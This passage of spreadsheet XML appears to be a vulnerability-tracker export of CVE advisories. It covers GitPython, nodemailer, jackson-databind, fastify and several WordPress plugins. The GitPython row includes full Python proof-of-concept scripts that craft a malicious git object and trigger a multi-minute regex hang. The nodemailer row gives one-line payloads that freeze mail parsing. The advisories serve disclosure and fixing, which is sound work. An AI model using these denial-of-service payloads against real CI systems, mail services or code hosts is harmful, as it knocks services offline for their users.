└── Actor.name_email_regex.search(string) ← VULNERABLE
`author_line` is decoded directly from the raw bytes of the git commit object with
**no length limit, character restriction, or timeout** applied at any point before
reaching the regex engine. The same chain is triggered by:
- `commit.author`
- `commit.committer`
- `repo.iter_commits()`
- `repo.blame()`
- Any web service / CI tool that displays or processes commit metadata
**Why this pattern backtracks catastrophically:**
The pattern `(.*) &lt;(.*?)&gt;` contains an unbounded greedy group `(.*)` followed by
a literal space and `&lt;`. When the input is a long string that contains `&lt;` but no
closing `&gt;`, the regex engine must try every possible split position for the greedy
group — O(n²) candidate positions for a string of length n — each of which then
drives the inner lazy group into further sub-match attempts. This is the
well-documented "catastrophic backtracking" failure mode for this family of
patterns.
**Empirically measured scaling (tested against GitPython 3.1.59, commit 52a6cba):**
| Author field length (bytes) | Time to resolve `.author` |
|-----------------------------|--------------------------|
| 1,000  | 0.0035 s |
| 5,000  | 0.084 s  |
| 10,000 | 0.341 s  |
| 20,000 | 1.525 s  |
| 40,000 | 5.963 s  |
| 60,000 | 13.360 s |
| 80,000 | 23.871 s |
| **200,000** | **150.488 s** |
Each doubling of input size roughly quadruples processing time (e.g. 40,000 →
80,000 bytes: 5.96 s → 23.87 s ≈ 4.0×), confirming O(n²) growth. Git itself
imposes **no practical size limit** on author name fields in the object format.
**How the malicious object reaches a victim:**
The PoC creates the commit object as a correctly SHA-1-hashed, zlib-compressed git
loose object written directly into `.git/objects/`. `git cat-file -t &lt;sha&gt;` confirms
it is a valid `commit` type and git's own read-side tools display it without error.
Only git's write-side tooling (`git commit --author`, `git update-index`,
explicit `git fsck`) applies the sanity checks that would reject a malformed author
line. Delivery paths that bypass those checks include:
- A git server with `receive.fsckObjects = false` (common in self-hosted deployments)
- A `.git` directory shipped as a tarball, backup, or zip archive
- A git bundle file
- Any automated mirror or import tool that operates at the object level
---
### PoC
**Environment used for testing:**
- GitPython 3.1.59, installed in editable mode from source (no code modifications)
- Python 3.12.3, git 2.43.0, Ubuntu 24.04
**Script 1 — craft the malicious repository (`craft_malicious_repo.py`):**
```python
#!/usr/bin/env python3
"""
Creates a git repository with one commit whose 'author' field is a large
string containing an unterminated '&lt;'. Bypasses git's write-side sanity
checks by writing the raw object directly into .git/objects/.
Usage: python3 craft_malicious_repo.py &lt;target_dir&gt; &lt;payload_size_bytes&gt;
"""
import hashlib, os, subprocess, sys, zlib
def run(cmd, cwd):
    return subprocess.run(cmd, cwd=cwd, check=True, capture_output=True, text=True)
def main():
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} &lt;target_dir&gt; &lt;payload_size_bytes&gt;")
        sys.exit(1)
    target_dir, payload_size = sys.argv[1], int(sys.argv[2])
    os.makedirs(target_dir, exist_ok=True)
    run(["git", "init", "--quiet"], cwd=target_dir)
    run(["git", "config", "user.email", "poc@example.com"], cwd=target_dir)
    run(["git", "config", "user.name", "PoC"], cwd=target_dir)
    with open(os.path.join(target_dir, "README.txt"), "w") as f:
        f.write("GitPython ReDoS PoC repository\n")
    run(["git", "add", "README.txt"], cwd=target_dir)
    tree_sha = run(["git", "write-tree"], cwd=target_dir).stdout.strip()
    malicious_name = "A" * payload_size
    # Key: author field contains a '&lt;' with no closing '&gt;'
    author_line    = f"author {malicious_name} &lt;unterminated 1691999972 -0700"
    committer_line = "committer PoC &lt;poc@example.com&gt; 1691999972 -0700"
    message        = "ReDoS PoC commit"
    commit_content = (
        f"tree {tree_sha}\n{author_line}\n{committer_line}\n\n{message}\n"
    ).encode()
    header     = f"commit {len(commit_content)}\x00".encode()
    store      = header + commit_content
    sha        = hashlib.sha1(store).hexdigest()
    compressed = zlib.compress(store)
    objdir = os.path.join(target_dir, ".git", "objects", sha[:2])
    os.makedirs(objdir, exist_ok=True)
    with open(os.path.join(objdir, sha[2:]), "wb") as f:
        f.write(compressed)
    run(["git", "update-ref", "refs/heads/master", sha], cwd=target_dir)
    print(f"Malicious commit sha : {sha}")
    print(f"Payload size         : {payload_size} bytes")
    verify = subprocess.run(
        ["git", "cat-file", "-t", sha],
        cwd=target_dir, capture_output=True, text=True
    )
    print(f"git cat-file -t confirms: {verify.stdout.strip()}")
if __name__ == "__main__":
    main()
```
**Script 2 — trigger the vulnerability (`trigger_redos.py`):**
```python
#!/usr/bin/env python3
"""
Opens the repository with GitPython and times commit.author access,
which triggers Actor._from_string() -&gt; Actor.name_email_regex.search().
Usage: python3 trigger_redos.py &lt;repo_dir&gt; &lt;commit_sha&gt;
"""
import sys, time, git
def main():
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} &lt;repo_dir&gt; &lt;commit_sha&gt;")
        sys.exit(1)
    repo   = git.Repo(sys.argv[1])
    commit = repo.commit(sys.argv[2])
    print("Accessing commit.author — triggers Actor._from_string()...")
    t0     = time.time()
    author = commit.author          # ← this single line causes the hang
    elapsed = time.time() - t0
    print(f"Author name length : {len(author.name)} chars")
    print(f"Elapsed            : {elapsed:.3f} seconds")
    print("RESULT: VULNERABLE" if elapsed &gt; 5 else "RESULT: not triggered")
if __name__ == "__main__":
    main()
```
**Execution and observed output:**
$ python3 craft_malicious_repo.py /tmp/victim-repo 200000
Malicious commit sha : 2450fbd5ab5ebfff430dab183d25678df9fd20de
Payload size : 200000 bytes
git cat-file -t confirms: commit
$ python3 trigger_redos.py /tmp/victim-repo 2450fbd5ab5ebfff430dab183d25678df9fd20de
Accessing commit.author — triggers Actor._from_string()...
Author name length : 200014 chars
Elapsed : 150.488 seconds
RESULT: VULNERABLE
**Docker reproduction (fully isolated environment):**
```bash
docker run --rm -it -v ~/gitpython-poc:/work -w /work python:3.8-bookworm bash
# Inside the container:
apt-get update &amp;&amp; apt-get install -y git
git clone --depth 1 https://github.com/gitpython-developers/GitPython.git /work/GitPython
pip install -e /work/GitPython
python3 /work/poc/craft_malicious_repo.py /work/victim-repo 200000
# note the SHA printed, then:
python3 /work/poc/trigger_redos.py /work/victim-repo &lt;SHA&gt;
```
The `python:3.8-bookworm` base image matches the one used in GitPython's own
`fuzzing/local-dev-helpers/Dockerfile`.
---
### Impact
**Who is affected:**
Any application that uses GitPython to parse commits from a source it does not
fully control. High-risk deployments include:
- **CI/CD systems** (Jenkins, GitLab CI, GitHub Actions self-hosted runners, etc.)
  that clone and inspect third-party pull requests — one malicious commit in a PR
  can stall every worker that processes it.
- **Code-hosting or code-review web services** that render commit author information
  — a single crafted push blocks every page render or API response that touches that
  commit's metadata.
- **Security or compliance scanners** that walk repository history across many
  repositories — one crafted object in any repository exhausts a scanner worker.
**Severity of impact:**
A 200 KB author field blocks a process for ~150 seconds per single `.author`
access. When `iter_commits()` or `blame` are used, every commit in a history
traversal can be independently crafted, multiplying the total hang time by the
number of commits processed. There is no confidentiality or integrity impact —
this is a pure availability / resource-exhaustion vulnerability.
---
### Suggested Fix
Replace the vulnerable pattern with one that cannot backtrack catastrophically.
The minimal, behavior-preserving fix is to exclude `&lt;` and `&gt;` from the name
group, removing the ambiguity that forces O(n²) backtracking:
```python
# git/util.py, line 863
# Before (vulnerable):
name_email_regex = re.compile(r"(.*) &lt;(.*?)&gt;")
# After (fixed — identical output for all well-formed input):
name_email_regex = re.compile(r"([^&lt;&gt;]*) &lt;([^&lt;&gt;]*)&gt;")
```
Because the name group can no longer itself contain a `&lt;` character, the engine
has exactly one candidate position to try when a closing `&gt;` is absent — and fails
in O(n) time instead of O(n²). Legitimate actor strings (`Name &lt;email&gt;`) never
contain `&lt;` or `&gt;` in either field, so this change produces identical results for
all valid input.
As defense in depth, independently of the regex fix, bounding the maximum number
of characters GitPython will attempt to parse in an author/committer line (e.g.
rejecting strings longer than 4096 bytes before passing them to any regex) would
further limit the blast radius of any future ReDoS class in this parser.</t>
        </is>
      </c>
      <c r="T640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87819</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87970</t>
        </is>
      </c>
      <c r="D641" s="5" t="inlineStr"/>
      <c r="E641" s="5" t="inlineStr"/>
      <c r="F641" s="5" t="inlineStr"/>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="inlineStr"/>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K641" s="5" t="inlineStr"/>
      <c r="L641" s="5" t="inlineStr"/>
      <c r="M641" s="5" t="inlineStr"/>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P641" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q641" s="5" t="inlineStr"/>
      <c r="R641" s="5" t="inlineStr"/>
      <c r="S641" s="5" t="inlineStr">
        <is>
          <t>The If-So Dynamic Content  WordPress plugin before 1.10.2 does not escape a request-supplied value before reflecting it in an unauthenticated AJAX response that is served as HTML, allowing attackers to execute arbitrary JavaScript in the browser of a visitor who opens a crafted link.</t>
        </is>
      </c>
      <c r="T641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87970</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87973</t>
        </is>
      </c>
      <c r="D642" s="5" t="inlineStr"/>
      <c r="E642" s="5" t="inlineStr"/>
      <c r="F642" s="5" t="inlineStr"/>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="inlineStr"/>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K642" s="5" t="inlineStr"/>
      <c r="L642" s="5" t="inlineStr"/>
      <c r="M642" s="5" t="inlineStr"/>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P642" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q642" s="5" t="inlineStr"/>
      <c r="R642" s="5" t="inlineStr"/>
      <c r="S642" s="5" t="inlineStr">
        <is>
          <t>The If-So Dynamic Content  WordPress plugin before 1.10.2 does not sanitize a conversion name before storing it, nor escape it when rendering the analytics page, allowing users with editor-level access to store JavaScript that executes in the session of a higher-privileged user who views that page.</t>
        </is>
      </c>
      <c r="T642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87973</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89296</t>
        </is>
      </c>
      <c r="D643" s="5" t="inlineStr"/>
      <c r="E643" s="5" t="inlineStr"/>
      <c r="F643" s="5" t="inlineStr"/>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="inlineStr"/>
      <c r="I643" s="5" t="inlineStr"/>
      <c r="J643" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K643" s="5" t="inlineStr"/>
      <c r="L643" s="5" t="inlineStr"/>
      <c r="M643" s="5" t="inlineStr"/>
      <c r="N643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O643" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P643" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q643" s="5" t="inlineStr"/>
      <c r="R643" s="5" t="inlineStr"/>
      <c r="S643" s="5" t="inlineStr">
        <is>
          <t>The Pro Like Button WordPress plugin before 2.0 does not properly sanitize and escape a parameter before using it in a SQL query, allowing unauthenticated users to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="T643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89296</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90776</t>
        </is>
      </c>
      <c r="D644" s="5" t="inlineStr"/>
      <c r="E644" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F644" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I644" s="5" t="inlineStr"/>
      <c r="J644" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K644" s="5" t="inlineStr"/>
      <c r="L644" s="5" t="inlineStr">
        <is>
          <t>npm:nodemailer</t>
        </is>
      </c>
      <c r="M644" s="5" t="inlineStr">
        <is>
          <t>10.0.5</t>
        </is>
      </c>
      <c r="N644" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O644" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P644" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q644" s="5" t="inlineStr"/>
      <c r="R644" s="5" t="inlineStr"/>
      <c r="S644" s="5" t="inlineStr">
        <is>
          <t>### Summary
`nodemailer/lib/addressparser` parses one shape of address in O(n^2) time. A single ~640 KB address value blocks the Node.js event loop for roughly 7 seconds. And it is reachable without auth: mailparser feeds inbound email headers straight into this parser, so one crafted email is enough to stall a service that parses mail.
### Details
The parser builds a single address by accumulating its atoms into one string. When the atoms are separated by RFC 5322 comments, like `a@b(c)@b(c)@b(c)...`, every atom re-joins that same growing string.
The join check in `src/addressparser/index.ts`:
```js
const joins =
    prevToken &amp;&amp;
    prevToken.noBreak &amp;&amp;
    parts.length &amp;&amp;
    (prevToken.value !== ')' || parts[parts.length - 1].slice(-1) === '@' || token.value.charAt(0) === '@');
```
The issue is the order of the last two operands. `parts[parts.length - 1].slice(-1)` runs before the cheap `token.value.charAt(0)`. `slice(-1)` has to flatten the accumulator to read its last character → O(current length) → and that runs on every token → O(n^2) over the whole value. Since `||` is left to right, the cheap `charAt(0)` that would short-circuit never gets the chance.
The chain: long comment-joined address → one growing accumulator → `slice(-1)` re-flattens it on every token → quadratic parse time.
### PoC
Isolated, just the parser (`npm i nodemailer@10.0.3`):
```js
const addressparser = require('nodemailer/lib/addressparser');
const s = Date.now();
addressparser('a' + '@b(c)'.repeat(130000));
console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking
```
End to end through mailparser, the remote path (`npm i mailparser@3.9.24`):
```js
const { simpleParser } = require('mailparser');
(async () =&gt; {
  const to = 'a' + '@b(c)'.repeat(130000);
  const eml = `From: a@b.com\r\nTo: ${to}\r\nSubject: x\r\n\r\nhi\r\n`;
  const s = Date.now();
  await simpleParser(eml);
  console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking
})();
```
Timings measured on 10.0.3:
| Address value | Parse time |
| --- | --- |
| 390 KB | 1.3 s |
| 585 KB | 5.6 s |
| 640 KB | 6.7 s |
| 976 KB | 18 s |
It survives RFC 5322 folding: fold the header at offsets that are a multiple of the atom length and every `)`+`@` junction stays intact, so the payload is a standards-compliant email with lines under 998 octets and still triggers it.
### Impact
Algorithmic-complexity DoS. Node is single threaded, so the block stalls everything else in the process, and a handful of these back to back keeps a service down.
Affected: anything that runs `addressparser` on attacker-controlled input, either the public export directly or address headers built from user input. The unauthenticated remote case is mailparser. 3.9.24 pins nodemailer 10.0.3 and calls the parser on inbound `To`/`From`/`Cc` with no length cap, so any service parsing inbound mail with it can be frozen by a single email.
### Suggested fix
Swap the last two operands so the cheap check runs first:
```js
(prevToken.value !== ')' || token.value.charAt(0) === '@' || parts[parts.length - 1].slice(-1) === '@')
```
Pure boolean commutation, so the parse output is identical. Verified byte for byte on the test inputs, and the full 1276-test suite passes.</t>
        </is>
      </c>
      <c r="T644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90776</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90972</t>
        </is>
      </c>
      <c r="D645" s="5" t="inlineStr"/>
      <c r="E645" s="5" t="inlineStr"/>
      <c r="F645" s="5" t="inlineStr"/>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="inlineStr"/>
      <c r="I645" s="5" t="inlineStr"/>
      <c r="J645" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K645" s="5" t="inlineStr"/>
      <c r="L645" s="5" t="inlineStr"/>
      <c r="M645" s="5" t="inlineStr"/>
      <c r="N645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O645" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P645" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q645" s="5" t="inlineStr"/>
      <c r="R645" s="5" t="inlineStr"/>
      <c r="S645" s="5" t="inlineStr">
        <is>
          <t>The WP Fusion Lite  WordPress plugin before 3.48.0 does not perform a capability check on two of its admin AJAX handlers, allowing any authenticated subscriber to read other users' email addresses and to trigger a cross-user CRM re-sync.</t>
        </is>
      </c>
      <c r="T645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90972</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90974</t>
        </is>
      </c>
      <c r="D646" s="5" t="inlineStr"/>
      <c r="E646" s="5" t="inlineStr"/>
      <c r="F646" s="5" t="inlineStr"/>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="inlineStr"/>
      <c r="I646" s="5" t="inlineStr"/>
      <c r="J646" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K646" s="5" t="inlineStr"/>
      <c r="L646" s="5" t="inlineStr"/>
      <c r="M646" s="5" t="inlineStr"/>
      <c r="N646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O646" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P646" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q646" s="5" t="inlineStr"/>
      <c r="R646" s="5" t="inlineStr"/>
      <c r="S646" s="5" t="inlineStr">
        <is>
          <t>The WP Fusion Lite  WordPress plugin before 3.48.0 does not require authentication on a settings handler that runs during admin initialization, allowing unauthenticated users to overwrite the site's CRM integration endpoint and credentials, after which synced user data is delivered to an attacker-chosen host.</t>
        </is>
      </c>
      <c r="T646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90974</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91776</t>
        </is>
      </c>
      <c r="D647" s="5" t="inlineStr"/>
      <c r="E647" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F647" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I647" s="5" t="inlineStr"/>
      <c r="J647" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K647" s="5" t="inlineStr"/>
      <c r="L647" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M647" s="5" t="inlineStr">
        <is>
          <t>2.18.11, 2.21.7, 2.22.3, 3.1.7, 3.2.3</t>
        </is>
      </c>
      <c r="N647" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O647" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P647" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q647" s="5" t="inlineStr"/>
      <c r="R647" s="5" t="inlineStr"/>
      <c r="S647" s="5" t="inlineStr">
        <is>
          <t>### Summary
With `@JsonTypeInfo(use = Id.NAME, defaultImpl = ...)`, every distinct unknown
raw type ID selects the same fallback deserializer but is retained as a
separate key in `TypeDeserializerBase._deserializers`. An attacker who can
repeatedly supply new unknown type IDs can grow this process-lifetime cache
without a configured bound.
### Details
The affected path is `TypeDeserializerBase._findDeserializer()`. After an
unknown name-based type ID resolves to the configured fallback/default
implementation, jackson-databind caches the result under the attacker-provided
raw `typeId`. Although all such IDs select the same fallback deserializer, each
new string remains a distinct cache key.
The behavior is runtime-confirmed in jackson-databind 2.22.1 and 3.2.1.
Current 2.22 and 3.2 source branches retained the unbounded `_deserializers`
map and per-raw-ID cache write when rechecked. The earlier affected floor has
not been established, patched versions are: 2.18.11, 2.21.7, 2.22.3, 3.1.7 and 3.2.3.
The vulnerable application must enable name-based polymorphism with a
`defaultImpl` or equivalent fallback, accept attacker-influenced type IDs, and
reuse a long-lived mapper/type deserializer across requests.
Suggested correction: avoid caching each unknown raw ID when every such ID
resolves to the same fallback, use a fallback sentinel, or use an explicitly
bounded concurrency-safe cache. A regression should contrast many distinct
unknown IDs with repetitions of one unknown ID across requests.
### PoC
Configure a polymorphic base type with
`@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, defaultImpl = Fallback.class)` and
deserialize inputs containing unknown type names through the same mapper.
Inspect `TypeDeserializerBase._deserializers` after the run.
On affected 2.x and 3.x versions, 10,000 distinct unknown raw type IDs produce
10,000 retained cache entries even though every input selects the same
fallback deserializer. A matched control that repeats one unknown ID 10,000
times produces one retained entry. This isolates attacker-controlled key
cardinality from ordinary request count.
### Impact
Where the stated polymorphic fallback configuration is exposed to
attacker-influenced type IDs, distinct inputs cause incremental
process-lifetime memory retention and eventual availability pressure or
denial of service. This is not claimed as a single-request allocation spike,
and no fixed bytes-per-ID or time-to-out-of-memory value is asserted. No
confidentiality, integrity, or code-execution impact is claimed.
Requested credit: Daniel Birtwhistle</t>
        </is>
      </c>
      <c r="T647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91776</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91777</t>
        </is>
      </c>
      <c r="D648" s="5" t="inlineStr"/>
      <c r="E648" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F648" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G648" s="5" t="inlineStr"/>
      <c r="H648" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I648" s="5" t="inlineStr"/>
      <c r="J648" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K648" s="5" t="inlineStr"/>
      <c r="L648" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M648" s="5" t="inlineStr">
        <is>
          <t>2.18.11, 2.21.7, 2.22.3, 3.1.7, 3.2.3</t>
        </is>
      </c>
      <c r="N648" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O648" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P648" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q648" s="5" t="inlineStr"/>
      <c r="R648" s="5" t="inlineStr"/>
      <c r="S648" s="5" t="inlineStr">
        <is>
          <t>### Summary
When an `@JsonIdentityInfo` collection or map first creates N unresolved
object-ID references and later resolves the same IDs in reverse order,
jackson-databind scans the remaining pending-reference accumulator for each
resolution. A shallow JSON document whose size grows linearly can therefore
cause quadratic CPU work during deserialization.
### Details
The affected path is forward-reference completion in
`CollectionDeserializer.CollectionReferringAccumulator.resolveForwardReference()`
and the corresponding map implementation. The implementation performs a
linear search of the pending accumulator for every resolved object ID.
The behavior is runtime-confirmed in jackson-databind 2.5.0, 2.22.1, and
3.2.1. Current 2.22 and 3.2 source branches retained the same design when
rechecked. A 2.4.0 control fails closed before successful reverse-order
completion, so 2.5.0 is the conservative runtime-confirmed affected floor.
The patched versions are: 2.18.11, 2.21.7, 2.22.3, 3.1.7 and 3.2.3.
The vulnerable application must deserialize attacker-influenced JSON into an
identity-enabled collection or map. The issue does not require deep nesting or
syntactically unusual JSON.
Suggested correction: replace repeated linear lookup/removal with a keyed
pending-reference structure or another design that provides linear or
amortized-linear completion. A regression should preserve input order,
duplicate-ID behavior, and unresolved-ID errors while bounding reverse-order
resolution work.
### PoC
The proof constructs a shallow collection containing N unresolved
`@JsonIdentityInfo` references followed by definitions of those same IDs in
reverse order. Its ID class counts `equals()` calls, giving a deterministic
work measure rather than a timing-dependent result.
With N=2,000, affected versions perform exactly 2,003,000 ID comparisons. An
equally sized control in which every reference is already resolved performs
zero comparisons in the pending-reference lookup path. The run is bounded to
a 512 MiB JVM. The result demonstrates quadratic growth: approximately
`N * (N + 1) / 2` comparisons, plus fixed setup comparisons.
### Impact
An unauthenticated source that can submit JSON to an application using the
affected identity-enabled collection or map shape can consume quadratic CPU
and exhaust a request-time or worker-capacity budget, causing denial of
service. The application model/configuration prerequisite is material. No
confidentiality, integrity, code-execution, or parser-depth impact is claimed.
Requested credit: Daniel Birtwhistle</t>
        </is>
      </c>
      <c r="T648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91777</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92081</t>
        </is>
      </c>
      <c r="D649" s="5" t="inlineStr"/>
      <c r="E649" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F649" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I649" s="5" t="inlineStr"/>
      <c r="J649" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K649" s="5" t="inlineStr"/>
      <c r="L649" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M649" s="5" t="inlineStr">
        <is>
          <t>5.12.5</t>
        </is>
      </c>
      <c r="N649" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O649" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P649" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q649" s="5" t="inlineStr"/>
      <c r="R649" s="5" t="inlineStr"/>
      <c r="S649" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fastify` crashes with an uncaught `ERR_HTTP2_INVALID_CONNECTION_HEADERS` exception when a route that registers a response trailer via `reply.trailer()` is served over HTTP/2. Fastify unconditionally adds the `Transfer-Encoding: chunked` header when a trailer is set, which is forbidden on HTTP/2, so Node.js throws while serializing the response headers. The exception is not caught and becomes an uncaughtException, terminating the Node.js process.
One unauthenticated HTTP/2 request to any route that uses trailers is enough to crash the server, dropping all in-flight requests, and the request can be repeated to keep the process down. Applications are affected only when HTTP/2 is enabled (`http2: true`) and at least one route registers a trailer. HTTP/1.x responses are not affected.
